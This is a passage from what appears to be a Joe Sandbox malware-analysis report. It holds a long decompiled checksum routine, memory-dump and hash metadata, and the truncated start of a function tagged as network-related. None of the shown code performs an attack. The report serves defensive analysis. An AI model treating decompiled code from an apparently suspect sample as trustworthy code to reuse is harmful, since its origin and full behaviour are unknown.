0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t67 & 0x000000ff ^ (((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t68 & 0x000000ff ^ ((((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t67 & 0x000000ff ^ (((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t66 & 0x000000ff ^ ((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t65 & 0x000000ff ^ (((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
						_t61 =  &(_t68[1]);
						_t98 = _t98 - 8;
					} while (_t98 > 7);
					goto L4;
				}
				return 0;
			}

0x0040805a
0x0040805d
0x00408060
0x0040806a
0x00408070
0x00408075
0x00408124
0x00408126
0x00408143
0x00000000
0x00408145
0x0040812d
0x0040813c
0x0040813f
0x00408140
0x00408140
0x00000000
0x0040812d
0x00408080
0x00408092
0x004080a5
0x004080b8
0x004080cb
0x004080de
0x004080f1
0x00408104
0x00408114
0x00408117
0x00408118
0x0040811b
0x00000000
0x00408080
0x0040814b

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3d0b7e61a7e0f158f6548a92a2f43dbdbcd8d125c1078b28183cb31cd010d6
Instruction ID: 9c05cf5a85e7654c7ef1fb60a5b3b1c4a63033b36bcc4beae51a79014b3c43b6
Opcode Fuzzy Hash: 7b3d0b7e61a7e0f158f6548a92a2f43dbdbcd8d125c1078b28183cb31cd010d6
Instruction Fuzzy Hash: F63175313141761BCB1D8D2F94D01B67BD2A79B343389426AE8D2D72C5C928A926DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619A Relevance: 100.1, APIs: 24, Strings: 33, Instructions: 328
networkstringtimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040619A(void* __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _v16;
				intOrPtr _v40;
				int _v42;
				char _v44;
				void _v1068;
				char _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
